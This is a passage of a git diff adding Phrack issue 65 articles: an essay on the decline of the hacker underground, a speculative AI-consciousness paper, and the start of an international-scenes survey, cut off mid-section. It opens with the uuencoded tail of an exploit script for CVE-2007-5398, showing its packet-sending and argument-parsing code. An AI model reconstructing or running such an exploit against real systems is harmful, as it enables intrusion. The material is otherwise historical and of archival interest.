+M;BAS96QF*3H-"@D)<&%C:V5T<R`]('-E;&8N0W)E871E4&%C:V5T<R@I#0H)
+M"7-E;&8N4V5N9%!A8VME=',H<&%C:V5T<RD-"@T*"0ES96QF+E1R:6=G97)6
+M=6QN97)A8FEL:71Y*"D-"@D-"F1E9B!P87)S95]A<F=S*&%R9W,I.@T*"69R
+M;VT@;W!T<&%R<V4@:6UP;W)T($]P=&EO;E!A<G-E<@T*#0H)<&%R<V5R(#T@
+M3W!T:6]N4&%R<V5R*"D-"@EP87)S97(N<V5T7V1E9F%U;'1S*&AO<W0]3F]N
+M92P@=&%R9V5T/4YO;F4L(&QI<W0]1F%L<V4I#0H-"@EP87)S97(N861D7V]P
+M=&EO;B@G+2UH;W-T)RP@9&5S=#TB:&]S="(I#0H)<&%R<V5R+F%D9%]O<'1I
+M;VXH)RTM=&%R9V5T)RP@9&5S=#TB=&%R9V5T(BP@='EP93TB:6YT(BD-"@EP
+M87)S97(N861D7V]P=&EO;B@G+2UL:7-T)RP@9&5S=#TB;&ES="(L(&%C=&EO
+M;CTB<W1O<F5?=')U92(I#0H-"@EO<'1S+"!A<F=S(#T@<&%R<V5R+G!A<G-E
+M7V%R9W,H87)G<RD-"@T*"6EF*&]P=',N:&]S="!I<R!.;VYE*3H-"@D)<F%I
+M<V4@17AC97!T:6]N+"`G2&]S="!A<F=U;65N="!H87,@;F]T(&)E96X@<W5P
+M<&QI960L('!L96%S92!R=6X@=VET:"`M:"!T;R!S964@<&%R86UE=&5R<R<-
+M"@T*"6EF*&]P=',N=&%R9V5T(&ES($YO;F4I.@T*"0ER86ES92!%>&-E<'1I
+M;VXL("=487)G970@87)G=6UE;G0@:&%S(&YO="!B965N('-U<'!L:65D+"!P
+M;&5A<V4@<G5N('=I=&@@+6@@=&\@<V5E('!A<F%M971E<G,G#0H-"@EI9BAO
+M<'1S+FQI<W0I.@T*"0EF;W(@=&%R9V5T(&EN($-615\R,#`W7S4S.3@N=&%R
+M9V5T<SH-"@D)"7!R:6YT("(E,3)S("`@("5S(B`E("AT87)G971;)VYA;64G
+M72P@=&%R9V5T6R=D97-C<FEP=&EO;B==*0T*#0H)"7-Y<RYE>&ET*#$I#0H-
+M"@ER971U<FX@;W!T<RP@87)G<PT*#0ID968@;6%I;BAA<F=S*3H-"@EO<'1S
+M+"!A<F=S(#T@<&%R<V5?87)G<RAA<F=S*0T*#0H)97AP;&]I="`]($-615\R
+M,#`W7S4S.3@H;W!T<RYH;W-T+"!O<'1S+G1A<F=E="D-"@EE>'!L;VET+G)U
+M;B@I#0H-"FEF(%]?;F%M95]?(#T]("=?7VUA:6Y?7R<Z#0H);6%I;BAS>7,N
+-87)G=ELQ.ETI#0H-"F%M
+`
+end
diff --git a/phrack65/13.txt b/phrack65/13.txt
new file mode 100644
index 0000000..dce9da4
--- /dev/null
+++ b/phrack65/13.txt
@@ -0,0 +1,350 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0d of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=-----------------------=[ The Underground Myth ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ By Anonymous ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+1 - Hacker's Myth
+2 - The Security Industry
+3 - Black Hat, Two Faces
+4 - Technology
+5 - Criminals
+6 - Forgotten Youth
+7 - The Forward Link
+
+-------------
+Hacker's Myth
+-------------
+
+This is a statement on the fate of the modern underground. There will
+be none of the nostalgia, melodrama, black hat rhetoric or white hat
+over-analysis that normally accompanies such writing.
+
+Since the early sixties there has been just one continuous hacking
+scene. From phreaking to hacking, people came and went, explosions of
+activity, various geographical shifts of influence. But although the scene
+seemed to constantly redefine itself in the ebb and flow of technology,
+it always had a direct lineage to the past, with similar traditions,
+culture and spirit.
+
+In the past few years this connection has been completely severed.
+
+And so there's very little point in writing about what the underground
+used to be; leave that to the historians. Very little point writing
+about what should be done to make everything good again; leave that to
+the dreamers and idealists. Instead I'm going to lay down some cold hard
+facts about the way things are now, and more importantly, how they came
+to be this way.
+
+This is the story of how the underground died.
+
+---------------------
+The Security Industry
+---------------------
+
+	Then in the U.S. music scene there was big changes made
+	Due to circumstances beyond our control... such as payola
+	The rock n roll scene died after two years of solid rock
+		- The Animals, circa 1964
+
+There is little doubt that the explosion of the security industry has
+directly coincided with the decline of the hacking scene. The hackers
+of the eighties and nineties became the security professionals of the
+new millennium, and the community suffered for it.
+
+The fact is that hackers, mostly on an individual basis, decided to
+use their passion as a source of income. Whether this is good, bad,
+or just pragmatic is completely irrelevant. Nearly all the hackers that
+could get jobs did. For the individuals that decision has been made (for
+better or worse), and in general there's nothing that will change this.
+
+This was a hacker exodus. What really mattered was not the loss of any
+individuals, but the cumulative effect this had on the underground. The
+more hackers that left the underground for a corporate life, the fewer
+that came in. And those who stayed became entrenched, increasingly
+disconnected.
+
+Collaboration in this new age of career hackers has all but ceased to
+exist. Individuals are now obsessed with credit. For their career, for
+their standing in the community, it must be absolutely clear who this
+research, this vulnerability, or even this opinion belongs to.
+
+There is no trust in this corporate community; an underground issue
+greatly amplified by corporate motivations. A single person can go months
+or even years without telling anyone exactly what he is working on, and
+whats more, will be genuinely worried about someone "publishing" their
+results before him. There is no respect for the information he holds,
+no belief that information should be free, no belief that research should
+be open. All that matters is credit; all that matters is fame and money,
+their career.
+
+This is purely the fault of the security industry, who has exploited
+and cultivated this culture, designed it for their needs. The truly sad
+thing is that the corporate security world hasn't realized that they are
+sitting on a gold mine, and as a result the mine is likely to collapse;
+and likely to take their industry down with it.
+
+The security industry uses information as its sole commodity, information
+about insecurity. Who has the information, and who doesn't is what
+makes this economy work. Whats more, the economy has been founded on
+the continued output of a finite group of hackers. For the most part,
+founded on those hackers that came out of the underground scene at their
+technical prime.
+
+But these hackers are not going to continue their production
+indefinitely. They will lose their technical edge, move on to other
+industries, perhaps climb the ladder up to management, and then
+retire. The question is, then what? Then it will be up to the new wave
+of young security professionals, whose motivation is as much financial
+as it is passion for the technology and the thrill of the hacking game.
+
+To imagine that these new wave office workers, university trained and
+disinterested, can match the creative output of a genuine hacker is
+laughable. The industry will stagnate under these conditions. The rapid
+technical advancement we have seen will end, no more breakthroughs:
+no more new security products or services. Just the same old techniques
+being rehashed again and again until the rock has been bled dry.
+
+I am trying to show you the symbiotic nature of the security industry
+and the hacking scene. Industry needs insecurity to survive, there is
+no doubt about this. A secure and stable Internet is not profitable for
+long. Hackers provided instability, change, chaos. So the industry became
+a parasite on the hacking scene, devouring the talent pool without giving
+anything back, not thinking of what will happen when there are no more
+hackers to consume.
+
+For this reason, the security industry, much like the hacker underground,
+is doomed, perhaps even destined for failure. But for now, all that
+matters is that we have a thriving industry and...
+
+A hacker underground proclaimed to be dead.
+
+--------------------
+Black Hat, Two Faces
+--------------------
+
+It would be easy to lay the blame squarely on the shoulders of the
+security industry. A lot of people have. Unfortunately, its not that
+simple. Perhaps the underground could have survived without the lure of
+a six figure job, but one thing should be made clear. The self-proclaimed
+black hat movement does nothing to help.
+
+Various black hat groups have claimed to be the voice of the underground,
+but the black hat scene was only ever a pale imitation of the actual
+underground. The underground wasn't at all interested in public
+self-aggrandizement, but this is all the black hats ever did. All that
+their various rants and escapades accomplished was to show how desperate
+they actually were for fame and recognition.
+
+But whats worse, while they often talk a big game, they very rarely have
+the pedigree to back it up. This is mostly because these self-proclaimed
+black hats are really just as self-serving as the white hats they pretend
+to detest. With few exceptions, those black hats that aren't already
+working in the security industry are those that don't have the skills
+to cut it.
+
+The entire anti-security theme was simply embarrassing. This was just the
+black hat movement admitting that they couldn't step up and represent
+in an increasingly technical world. Where once hacking skill commanded
+respect, now the black hats were promoting misinformation in order to
+make what few hacks they managed to pull off easier. They couldn't step
+up to a challenge, they couldn't outsmart the white hats they so detest.
+
+This ineptitude and misguided fervor of the black hat scene had a
+massive negative impact on the hacking underground. The true voice of
+the underground was lost behind the noise and drama, until the voice
+became a whisper.
+
+And then eventually fell silent.
+
+----------
+Technology
+----------
+
+The very nature of technology, a dynamic and intractable force, had a lot
+to say in the demise of the hacking world. In many cases, if a black hat
+had been active 5 or 10 years earlier they would have been technically
+competent and may well have contributed significantly. This is because
+with the utmost respect, and despite all the nostalgia, hackers of the
+past had it easy.
+
+In the early years, the problems hackers faced were largely related to the
+availability of information. Isolated groups of people had their tricks
+and techniques, and sharing this information was problematic. This is
+in direct contrast with the situation today, where there is an excess
+of information but a void of quality.
+
+As a result of many differing factors, the world is becoming aware of the
+threats posed by lax security. When there is money at risk, steps will
+be taken to protect those assets. We see now an increasing move towards
+technical security mechanisms being employed as part of a defense in
+depth strategy, and as a result, to be a hacker today requires immense
+technical ability in a broad range of disciplines. It takes years of
+individual study to reach this level.
+
+But unfortunately, fewer and fewer people are willing, or indeed capable
+of following this path, of pursuing that ever-unattainable goal of
+technical perfection. Instead, the current trend is to pursue the lowest
+common denominator, to do the least amount of work to gain the most fame,
+respect or money.
+
+There has also been an increasingly narrow range in what is published. In
+part this is because of the lack of accessibility of certain systems
+(through obscurity or price), but this is also increasingly dictated by
+fashion. In a desire to fit in with the community, to be accepted in
+to conferences, to be seen doing the right things in the right places
+with the right people, researchers are all too happy to slot in to this
+pattern of predictable and narrow progress.
+
+And even then, the standards of what makes acceptable research, or for
+what makes a vulnerability interesting, drops with every year. The gap
+between offensive research and defensive implementations continues to
+grow, to the point where public vulnerability research has become a
+parody of what it once was, a type of inside joke.
+
+There is no creativity, no sense of arcana anymore.
+
+---------
+Criminals
+---------
+
+From Operation Sundevil to cyber terrorism. The criminalization of
+computer hacking and, by association, computer hackers had a devastating
+impact on the underground. Hacking was criminalized in two ways, both
+of near equal importance: by legislation of computer crimes, and by the
+new trend of genuine criminals using hacking as a method for fraud.
+
+There should be a clear separation between these two things. The fact
+that the underground collectively became criminals under the law for
+what they had been doing for, in some cases, decades. And the fact that
+in public perception, even among professionals that should know better,
+there was very little distinction between a genuine hacker and those
+criminals using hacking purely as a method for profit.
+
+Indeed, little of what organized crime and terrorist/activist groups
+are doing could justifiably be labeled hacking. It is simply convenient
+to make this simplification, in media and in industry. The security
+industry knows the difference, but they have no economic interest in
+there being any clarity on this point. Any sort of hacking, anything
+they can sensationalize enough to scare their profit margin up suits
+them perfectly.
+
+For the underground, these issues largely affected individuals, not the
+broader structure of things. Each person had to make a personal decision
+on whether it was worth 1) being seen as a criminal under the law and
+2) being seen as a criminal in public perception. Why should the hacker
+face this when such an easy, safe, respectable alternative is available
+in the security industry?
+
+Even the term black hat has been twisted into something more closely
+aligned to organized crime. For all their faults, black hats were not
+(in theory) motivated by this type of money.
+
+It comes down to an aging hacking population deciding, on an individual
+basis, to settle down with their families, their material possessions,
+their careers. No one can argue that there is anything wrong with this. It
+is just a fact that these hackers left the scene behind.
+
+Leaving a void too large to be filled.
+
+---------------
+Forgotten Youth
+---------------
+
+The forgotten aspect of this whole story is, without doubt, the importance
+of new talent entering the world of hacking. Historically, hacking has
+belonged to the young. With every passing year, the average age of hackers
+collectively increases. Some would claim this is a sign of a maturing
+discipline. For surely, what could youth possibly contribute in this
+technological landscape? They call them kids, dismiss them as irrelevant.
+
+Despite all of the issues facing the underground, if hackers had managed
+to get this one aspect right, if they had recognized the importance
+of those who would come after them, if they had given them something
+to aspire to be, if they had directly or indirectly taught them the
+accumulated wisdom that so often separates a hacker from the crowd;
+then perhaps there still would be a hacker underground.
+
+Nearly all of the situations surrounding the disestablishment of the
+underground were circumstantial, there was nobody to blame, and nothing
+that could be done. But one point for which this was not true was the
+underground's obligations to young hackers. An entire generation of
+talented hackers have lost the opportunity to become a part of something
+bigger than themselves by participating in a functioning hacking
+community, simply because hackers were too self-absorbed to notice.
+
+The decline of the underground scene happened relatively quickly, and
+also relatively quietly. The hacker who left the underground behind
+for his new life was unlikely to justify or explain his choices. In
+fact it was more likely he would deny being changed at all. It's likely
+he'd even continue to have contact with his fellow ex-hackers, in some
+imitation of the underground scene. This only helped to obscure what
+was actually happening.
+
+Today's youth, for the most part, have no true understanding of hackers
+or hacking. They have no knowledge of the history, no knowledge that
+a history even exists. Their hacker is the media's hacker, the cyber
+terrorist, the Russian mafia. This is unfortunate, but the real trouble
+begins for those few that somehow become interested enough to look a
+bit deeper.
+
+The average person requires some form of role model, something to aspire
+to, to imitate and to an extent, to idolize. At this time, the only
+visible efforts were the white hat researchers, the black hat horde or
+various other technically inept self-proclaimed 'experts'. There is so
+little inspiring research, and even less inspiring hacking, that anyone
+new to the world of hacking is almost invariably left with a skewed
+impression of things.
+
+Indeed, for a lot of the young people that managed to acquire the
+necessary technical base, hacking was seen as simply an interesting career
+path. There is no passion in these people, no motivation to extend and
+create. A competent professional, valued employee.
+
+But no longer a hacker.
+
+----------------
+The Forward Link
+----------------
+
+The hacker underground has been systematically dismantled, a victim of
+circumstance. There was no reason for this, no conspiracy, no winner. A
+conquered people, but with no conqueror, no enemy to fight. No chance
+of rebellion. Conquered by circumstance, if not fate.
+
+At first this would seem to be a bleak message. What is the point of
+even trying anymore? Why practice a dead art? But the truth is that the
+art is not dead, just the circle that brought the artists together. The
+hacker underground is broken, but the hackers are not.
+
+Casualties have been high; but there still exists a scattered,
+marginalized, and misrepresented people who are the hackers. Hackers,
+not black hat nor white, not professionals, not amateurs (surely none
+of this matters), are still out there in this world today, still with
+all the potential to be something great.
+
+The question is not then how to artificially group these people into a
+new underground movement. The question is not how to mourn the passing of
+the golden days, how to keep the memories alive. There are no questions
+of this sort, no problems that can be solved or corrected by individual
+action.
+
+All that remains is to relax, to do what you enjoy doing; to hack purely
+for the enjoyment of doing so. The rest will come naturally, a new
+scene, with its own traditions, culture and history. A new underground,
+organically formed over time, just like the first, out of the hacker's
+natural inclination to share and explore.
+
+It will take time, and there will be difficulties. Some will not be able
+to let go of the past, and some will fail for not remembering it. But
+in the end, after everything has been said and done, the equilibrium
+will be restored.
+
+A new world, at the frontier of cyberspace, belonging to the hackers
+by right.
diff --git a/phrack65/14.txt b/phrack65/14.txt
new file mode 100644
index 0000000..7f23f0e
--- /dev/null
+++ b/phrack65/14.txt
@@ -0,0 +1,412 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0e of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=-------------=[         Artificial Consciousness        ]=-------------=|
+|=-------------=[ A complete human behaviorism simulation ]=-------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[    by -C    ]=----------------------------=|
+|=--------------------------=[  c@cdej.org ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+In 1956 John McCarthy defined the term Artificial Intelligence as
+"The science and engineering of making intelligent machines".
+Obviously, while studying artificial thoughts processing, we eliminated 
+the human factor of Neuro-linguistic filters that the brain applies on the 
+meta receptors layer. A computer program simply will never tackle a thought
+based on impulsive reactions. There is no human behaviorism in AI.
+Instead, we substitute this mechanism with an algorithm of computational 
+processing and information storage indexing. Here resides the very core of 
+AI science. Many algorithms have been evolved and applied, overcoming
+faulty thinking, infinite loops of exclusive-OR decision making, and
+geographic/territorial mapping of robotics, and so forth.
+Fifty two years later, we intend to rationalize a new approach to this 
+field, trying to keep away from science fiction.
+
+This paper is fairly introductory to both classic AI and our AI model,
+and requires no prerequisite except a bit of curiosity for this field,
+so enjoy reading.
+
+---------------------------------------------------------------------------
+
+
+I. Introduction
+   a) Abstract
+   b) Central Processing Spirit
+
+II. Character assignment design
+a)	Psychological growth
+b)	Neuro-performance
+c)	Reception -> Reactions -> Style
+
+III. Ontology / knowledge engineering
+a)	Are we Heuristics?
+c)	Sub-symbolic design
+d)	Artificial Desire
+e)	Reasoning
+
+IV. Conclusion
+
+
+
+
+I.	Introduction
+
+a) As a primary reflection on Artificial Intelligence, one must find it 
+vital to proceed according to a precise scientific approach for analysis
+of thoughts. 
+A thought is an idea. A piece of information that the mind recalls.
+This (POI) is processed by the chemo-electronic factory of the brain, 
+and gets tainted by the MIND. Neuro Linguistic Programming theories 
+organized the brain functions and how it deals with information through 
+various filters. We borrow a basic segment and build upon it a 
+resemblance in machine land:
+
+- Similar thoughts stored in memory (anchoring)
+- Virtues and choices (decision making)
+- Freedom to take risk endeavors. (problem solving)
+
+b) To tackle this ordeal from ground zero would be an enormous load on one 
+article or paper to handle. Therefore we assumed our study from a point 
+where we have advanced in applying to our AI subject, using the
+international common speech utility that is the English language, coupled
+with a set of rules we engineer as an esthetical appeal for this entity.
+These rules, as we will explain later on, do not follow the EXPERT SYSTEM
+decision making logic, where as human knowledge changes, the entire module
+will have to be rebuilt; instead our model will take its decisions based on
+Index Priority, that varies automatically as the AI experiences new events.
+In other words, we design our program a personality. This generic model is
+based on dual channel thought processing, fed by a hierarchy of database
+storage devices where each family of thoughts is preserved in its own
+design. Some of these databases, or sets of thoughts, will have a read only
+access permission, some will have read and write access permission, and
+some will only have write permissions, to be used as a temporary allocated
+space for acquired thoughts before sending the entire data structure to
+Central Processing Spirit. As we amusingly named(CPS).
+
+While the read only access structures will hold information that relate
+only 
+to the fundamentals of the entity's core design, and provide our first line
+of defense once the automation process of Self Information Gathering (SIG) 
+will be launched; From supplied text experts, web information, news, and
+much more feeds;
+the write only permission space will be as such for the sake of restricting
+the AI entity from any premature usage of these new acquired thoughts
+before 
+being processed, organized and approved by the CPS (or the programmer). 
+
+Thinking about this design will surely summon up issues of time
+consumption. 
+How long will this construction take?
+A minimum of one human lifetime? But that is highly acceptable with the 
+implementation of 2nd generation AI replication algorithms, which is a 
+base model of AI hybrid reproduction, resulting in the jointure of 2 AI 
+entities CPS and dBases.
+This dual model inheritance is not designed to be similar to the human 
+reproduction between one male and one female human beings, but it has 
+to do with the design of dual channel thought processing as mentioned 
+previously. We tend to believe that our model's reproduction, has to occur
+between one couple. 
+This is matter of MULTI AGENT PLANNING and community scheduling, 
+and is beyond the scope of this paper.
+
+II. Character assignment design
+
+a)	Psychological growth.
+"It's not how perfect you do something that's important, but how others 
+perceive it."
+A famous question is always there. Could a machine have life, or will it be
+dry simulation. Basically, this should not matter at all!
+
+Regardless of the process a human being achieves in developing a unique
+character, and the tremendous complexity that subsists in his
+neuropsychological growth, it almost only pertains to how others interpret 
+his reactions and behavior. 
+That in mind, we couldn't care less about how a machine obtaining a real
+genuine thought, or a lifelike style of its own. We will design an
+algorithm of learning that will eventually attribute a character to the
+machine, depending on how much and how fast it could process the SELECTED
+REACTIONS.
+
+In other terms, given one action that is having ten children listen to an
+adult instruction such as "Finish your homework, then watch TV" we could
+observe ten different reactions ranging from obedience, to defiance. And
+that relates to:
+-	How bad the child wants to watch TV
+-	How important are his homework
+-	What is shown on TV
+-	Is it a circumstance free situation or has it to do with another 
+      (might say no in revenge for not having ice cream an hour ago)
+-	and much more situational parameters.
+
+
+In machine land, our CPS would have built a certain database of events in 
+correlation with the outcome that happened, indexed them according to a 
+judgmental scale, and throughout its uptime, it will select how to react 
+upon life events according to what it has been fed as an Index Key
+Priority.
+
+Technically speaking, this is very easily programmable with recent database
+technologies and language. The more parenting and training our CPS takes,
+and efficiency in our database selection design, the more chances are to
+obtain a unique character and attitude.
+
+b) The two paradigms of learning that concern us are:
+SUPERVISED and UNSUPERVISED. 
+
+First, let us talk about the basics of machine learning. 
+Classic AI always outlined machine learning from reaching a state of
+consciousness, as it is believed that computer learning is only about
+designing algorithms to find statistical regularities or various data
+patterns. And then tried to resolve problems such as Classifications,
+exclusive-OR decisions, and so forth, with Decision Trees.
+Decision Trees are a simple but effective logic design, where a chain of
+boolean questions might take you down the leafs as you pick up your choices
+Yes,No,No,Yes.
+In our opinion, and as Neural Networks progress only showed, this design
+could attain at its best a good speech recognition utility or a medical
+assistance program that would diagnose and evaluate cancer subjects.
+
+In this approach, Supervised Learning is the logic of feeding the AI with
+rules of a world (classification system) we already created, and relying
+heavily on the training our machine gets in order to minimize the error
+margin (Markov theorem, Bayesian Networks.)
+
+On the other hand, Unsupervised Learning shifts interest more toward
+decision making than it is to classification. It is simply a way to find a
+framework suitable for decision oriented reasoning, based on a
+punish/reward outcome.
+This model builds up a history of results, upon which it bases a
+statistical decision making techniques for the future questions at hand.
+Clustering is the second Unsupervised Learning type, and is achieved by
+finding similarities in the training data, not trying to boost a utility
+function.
+
+Now that this was said, let us think about the limitations.
+
+Whether we preprogrammed the AI to reach a certain purpose, or by itself 
+as a systematic self-learning module, the LEARNING mechanism should always 
+follow one standard set of stimuli. 
+
+
+Let's outline this from the point of view of cognitive psychology:
+-	Memory and recognition. It is a fairly straightforward job for a 
+        programmer to design a system with pattern matching, measuring of 
+        distances, and sequential treatment of information.
+
+-	Verbal and linguistic evaluation. The AI should have a method to 
+   	distinguish and assess similar information indices. Just like a 
+   	human deja vu, it MUST relate the event to different occurrences 
+   	stored in the memory, and decides its reaction based on how
+        significant the other instances were at the time. This will
+        eventually allow us to hope that this design would one day generate
+       (i.e)new sentences of its own. 
+
+Interesting! Imagine the AI analyzing large amounts of data, images, 
+sounds... on a regular basis while indexing the databases according to 
+what possible emotions they would generate, and have it finally trained 
+for this evaluation. It should come as no surprise if we had a design 
+that could write poetry!
+
+- Comprehension. As absurd as this might sound, AI has better assimilating
+facilities than humans. The process of comprehension is the most
+complicated phenomenon observed in Neuroscience, but from the very simple
+facts we concluded, machinery has the upper hand due to greater speed of
+processing than and better memory storage than ours. Now this is not a
+comparison between Men and Machine. We simply mention this as a fact that
+AI surpasses the human limitations of comprehension and it is only
+intuitive that such a design is possible. 
+
+- Neuro linguistic science has shown that humans have more
+difficulties understanding negation sentences than simple affirmative ones.
+Unlike humans, computer science treats booleans with the same speed and
+effort. 
+Many more disadvantages of comprehension process simply do not exist in AI.
+   
+That also means a great supply of information will be needed.Be it
+negations, complexity or ambiguity of sentences, this AI model is able 
+to treat them with promising speeds to reach a self learning stage. 
+Associating actions to the reactions analysis.
+
+
+c) Perceiving the Universe is a mapping mechanism of Time and Space that 
+we encounter through our biological senses. This we shall call the 
+FLUXION SENSITIVITY. 
+Most importantly is to apply a successful text mining / pattern matching
+module to our AI, which will analyze text as its only sense of the
+Universe. 
+Fifty years of progress in this field allowed many researchers to reach 
+a respectable level to the extent of using some customized AI programs in 
+forensic psychology and criminology investigation. 
+The only new idea our model has to bring to the world of AI is an 
+EMOTIONAL SIMULATION module.
+
+Emotional simulation is a two-way library of reactions prediction.
+Let us go into that.
+For each event, a human being would display a certain emotion. 
+This is vastly exposed in body language, tonality, timeline of the speech, 
+and verbal choices.
+We will only be concerned in expression analysis and timeline display.
+
+Our model was based on a typology study done at the University of Kent, 
+for a police interview tactics handbook. We used the same algorithm to 
+detect emotions and display them in return.
+(Think of it more as detecting the logic behind emotions.)
+
+The Kent model is a big failure and nonsense, but nevertheless the three 
+steps of the design set the stage for our Emotional Simulation (but in
+reverse):
+
+-	delivery
+-	maximization
+-	manipulation
+
+[Note: some readings about Kent's model could be in hand at this time]
+
+In short, delivery has about 12 variables of expressions, open, close,
+leading. Maximization occurs when police agents try to intimidate the
+subject and push him to give out more clues. Our maximization is fishing
+for clues technique, used by asking more key questions.
+There is not much to explain about manipulation. In our study, it could
+easily be merged with the maximization step.
+
+Hopefully, in a few months (by mid 2008), we could put a complete program 
+to test, that will not only detect the meanings of expressions, but will
+also "assume" the emotions behind them, and switch its mode to the
+appropriate behavior. 
+
+This AI will be the first model that could literally switch moods.
+
+=========================================================================
+
+III. Ontology
+a) Are we heuristics?
+
+For the second part of this paper, we will be discussing the core formation
+for this AI model. Its existence and what constitutes its regulations.
+A common pitfall most AI scientists encounter is, to have a design based on
+precise mathematical reactions and decisions. Now let's go over this method
+first.
+
+The evolution of AI happens to go from mimicking human responses, to
+impressive behavior simulation. The designer usually tries to produce a
+perfect replica of the human performance. 
+
+Now what will happen if even the most advanced researches in neuroscience
+haven't even scratched the shell of human neuropsychology? most importantly
+DECISION MAKING. How would we replicate a phenomenon if we haven't fully
+understood what drives it and how it reaches its steps?
+This is why computer science employs a preprogrammed set of responses,
+based on what the designer believes is appropriate for humans, implementing
+a classic database structure that can only lead him to a one-way exclusive
+question-answer AI.
+This classic method is flawed. Period.
+
+One better approach to this is to avoid concepts of imitation and jump
+right through to what is called a Rule Of Thumb mode, which allows a
+certain vague margin for correct answers.
+Using a heuristic method to resolve the problem of decision making, not
+only set stage for a more fluid AI, but also showed us practicality and
+broader playground for the programmer.
+In terms of allowing many indexing modules to play the role of priority
+selector for each decision that is to be made.
+
+For example, if you have to decide what pizza to order. Your mind filters
+would process and infinite numbers of POI before putting the decision in
+perspective, and most of the times, you normally "feel" it was a random
+choice and you could have survived with others. 
+But what if you try one kind, and found it was so delicious that you wanted
+to order it again next time? This is where the priority indexes come in
+handy.
+The CPS has the freedom to add, remove, promote or demote indexes for each
+POI or family of POI, based only on what it "assumes" to be an acceptable
+circumstance.
+
+This is a tricky turnaround in theory, but for the programmer, it is still
+the same straightforward job, and could be the first gap filler between
+boring Q/A programs and Hollywood Incredible Sci-Fi.
+
+
+
+
+c)	Sub-symbolic design
+
+In order to architect a sophisticated knowledge design, Newel and Simon
+invented the theory of symbolic design, where a set of semantic rules might
+be applied to construct a further more complex structure.
+I won.t say we are restricted to the subsymbolic design, but in fact, this
+theory fits perfectly.
+So both sides of sub-symbolic design are used to our advantage and not
+changed in theory:
+-	Alternative development
+-	Hybridism of subsymbolic and classic symbolic NLP (Natural Language
+Processing). Once the learning module is concluded, SS design will set the
+stage for the real MULTI-AGENT interference.
+
+The geometrically increasing computing power promotes five factors tending
+to reduce radically the role of any species of logic in IT :
+
+1. Since deterministic applications are vanishing, the conventional
+   algorithm (pattern marching) is not anymore program backbone.
+
+2. Even when still useful, the conventional algorithm is not anymore the
+   main programming instrument.
+3. In AI the symbolic paradigm is steadily replaced by several sub-symbolic
+   ones, based on fine-grain parallelism.
+4. Even when symbols are used, they are stored in and retrieved from huge
+   and cheap memory, rather than processed through sophisticated reasoning
+   schemes (case-based reasoning is just a blatant example).
+5. Cognitive complexity of new, sophisticated logics is too high for a 
+   designer, when cut and try, is affordable.
+
+
+This might sound a big deal of mambo jumbo at this point, considering the
+introductory nature of this paper, but more in depth details about this
+once the publication of this project will be official. 
+
+d)	Artificial Desire
+
+Very little have we to say about Artificial Desire. As we saw in the index
+priority and POI set of rules, we might easily trigger a vice-random
+decision when it comes to natural desire for things, but at this point, we
+haven.t even perfected any way to make the AI really desire something. More
+like have it chose from a similar range of choices based on time
+variations, frequency of this choice, or event yet, have it try something
+for a first time. Neither us, or anyone who previously indulged in AI
+science dares to claim giving a machine this attribute.
+Nevertheless, having a decent normal vice-random desire choice maker
+module, will simulate human behaviorism to a great extent, and fakes it.
+"We could have different choices with each one a probability of success
+based upon the past:
+
+- 90%
+- 88%
+- 85% " as explained earlier.
+
+So generally AI choses the first choice but for one time AI wil go for the
+second and see what happen. That could be considered as a "desire".
+
+This fake simulation might also apply to the reasoning construct.
+Even if applied conforming to Kant.s practical reasoning, we still have to
+forge a "moral decision" based on what our CPS has a-priori set of rules,
+and have the programmer stand in charge of supplying 
+the AI with this route.
+
+
+IV. Conclusion
+
+In a few words, I would like to apologize for the dry style of this paper,
+it started as a dissertation thesis and ended up as my future hobby side
+project. We might never even come close to a full artificial conscious
+design, but this model introduction surely drew a few interesting
+turnarounds that might facilitate future innovations.
+I hope reading it was exciting enough for as many of you to be interested
+in further studies about this wonderful field.
+
+	
+	-C
+	c@cdej.org
+
diff --git a/phrack65/15.txt b/phrack65/15.txt
new file mode 100644
index 0000000..ec301be
--- /dev/null
+++ b/phrack65/15.txt
@@ -0,0 +1,760 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0f of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ International scenes ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[    By Various     ]=------------------------=|
+|=------------------------=[ <various@nsa.gov> ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+For this release, 3 new international scenes are presented. The phrack 
+staff would like to thank people who took the time to share information 
+about their scene. A special thanks to gmac for having written something 
+about a country that probably none of us know. 
+
+Once more, we would like to emphasize that we would like to see 
+different scenes than the usual presented. We particulary think
+of China, Russia or South American countries. 
+
+For this release, we have:
+
+1. Italia
+2. Portugal
+3. Uganda 
+
+--------------------------------------------------------------------------
+
+         An overview of the italian underground (1994-2007)
+
+
+You did read about the Italian scene last time on Phrack #47 [0], just
+a few months after the Italian Crackdown in 1994. This short article is
+an attempt to sum up the evolution of the Italian underground since
+those days.
+
+1994 was the year of the so called Italian Crackdown (aka FidoBust): a
+wide (and wild) Finance Guard operation nominally aimed at busting
+warez BBS. A stunning total of nearly 200 BBS systems on the FidoNet
+network were seized with irresponsible methods including, but not
+limited to, the requisition of all electronic equipment from the sysops
+(included modems, cables, keyboards, monitors, ...) as well as the
+police sealing whole rooms.
+
+In its first phase the purpose of the operation was to fight the illegal
+market of copied software and to satisfy the BSA lobby this way. However
+subsequent seizures and raids proved the crackdown also had a political
+objective. The bust included BBS that belonged to CyberNet (a network
+supporting the motto "INFORMATION WANTS TO BE FREE", populated by
+hackers and cyberpunks alike, close to social centres), ECN [1]
+(european network dedicated to broadening political debate and providing
+counter-information about social themes and workplace politics) and
+PeaceLink [2] (peace/ecologist association and network).
+
+Though just a few BBS were really involved in sale of warez, a lot of
+completely legal BBS closed to never open again as a result of the bust.
+
+As new people were being busted, the national press gave its best at
+building castles in the air about hackers and describing them as
+software pirates or members of organized crime. The underground reacted
+striking to the reliability of media with a round of actions signed by
+the multiple name Luther Blisset [3]. The campaign adopted hoaxes and
+communication guerrilla to show the unsuitability of journalists, and
+even managed to have Mondadori, the second most important publishing
